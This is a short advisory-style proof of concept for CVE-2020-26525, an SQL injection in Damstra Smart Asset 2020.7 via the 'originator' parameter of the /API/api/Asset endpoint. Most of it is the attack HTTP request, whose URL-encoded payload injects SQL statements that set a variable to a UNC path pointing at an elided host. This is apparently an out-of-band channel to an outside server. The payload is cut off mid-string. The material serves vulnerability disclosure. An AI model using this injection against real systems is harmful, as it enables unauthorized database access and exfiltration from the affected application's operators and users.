Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter.
SmartAsset-SQLinj-CVE-2020-26525 Damstra Smart Asset 20207 has SQL injection via the API/api/Asset originator parameter Smart Asset - version 20207 CVE-2020-26525 ========================== HTTP Request: GET /API/api/Asset?assetCode=XXX-08-X-01-06-01& originator=FIRSTNAMELASTNAME'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c<>%5cqoe